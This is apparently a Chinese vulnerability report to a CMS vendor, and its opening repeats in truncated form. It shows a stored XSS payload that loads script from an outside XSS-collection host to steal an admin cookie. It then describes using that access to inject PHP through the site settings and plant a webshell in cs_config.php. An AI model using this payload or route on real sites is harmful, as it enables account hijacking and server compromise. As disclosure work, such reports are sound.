### 简要描述: 好吧 亲爱的广商我又来了。。发现这个广商态度还是很不错的 ,这样才能让自己的产品更加完善。 ### 详细说明: 一: xss 添加 文章处 直接提交 xss代码 会被过滤。用 火狐live http replay post提交 ``` </textarea><script src=http://xss.webvul.com/5NVhnS></script> ``` [<img src="https://images.seebug.org/upload/201403/0319444727430208dfd6df897bc9662d6082186d.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/0319444727430208dfd6df897bc9662d6082186d.jpg) 好吧。。后台审核文章,编辑,看下源码 [<img src="https://images.seebug.org/upload/201403/031946374f1b1f3797f24ef1b174a3c933323376.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/031946374f1b1f3797f24ef1b174a3c933323376.jpg) 插进去鸟~ [<img src="https://images.seebug.org/upload/201403/03200220ab2d02458f74c17e8b1c728b47263828.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/03200220ab2d02458f74c17e8b1c728b47263828.jpg) 二 :getshell 收到 cookie后 修改基本信息 [<img...
### 简要描述: 好吧 亲爱的广商我又来了。。发现这个广商态度还是很不错的 ,这样才能让自己的产品更加完善。 ### 详细说明: 一: xss 添加 文章处 直接提交 xss代码 会被过滤。用 火狐live http replay post提交 ``` </textarea><script src=http://xss.webvul.com/5NVhnS></script> ``` [<img src="https://images.seebug.org/upload/201403/0319444727430208dfd6df897bc9662d6082186d.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/0319444727430208dfd6df897bc9662d6082186d.jpg) 好吧。。后台审核文章,编辑,看下源码 [<img src="https://images.seebug.org/upload/201403/031946374f1b1f3797f24ef1b174a3c933323376.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/031946374f1b1f3797f24ef1b174a3c933323376.jpg) 插进去鸟~ [<img src="https://images.seebug.org/upload/201403/03200220ab2d02458f74c17e8b1c728b47263828.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/03200220ab2d02458f74c17e8b1c728b47263828.jpg) 二 :getshell 收到 cookie后 修改基本信息 [<img src="https://images.seebug.org/upload/201403/0320034090dcb61fc3a924504ea93744e2d6bfe1.jpg" alt="4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/0320034090dcb61fc3a924504ea93744e2d6bfe1.jpg) 可以看到 phpinfo执行了 [<img src="https://images.seebug.org/upload/201403/032006511cd14c570f32f55700c5aea2f2cc6182.jpg" alt="5.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/032006511cd14c570f32f55700c5aea2f2cc6182.jpg) 插一句话的话 连接文件为 csdj/lib/cs_config.php 第三次 提交了。。。多给点 rank瑟。。 ### 漏洞证明: [<img src="https://images.seebug.org/upload/201403/032006511cd14c570f32f55700c5aea2f2cc6182.jpg" alt="5.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/032006511cd14c570f32f55700c5aea2f2cc6182.jpg)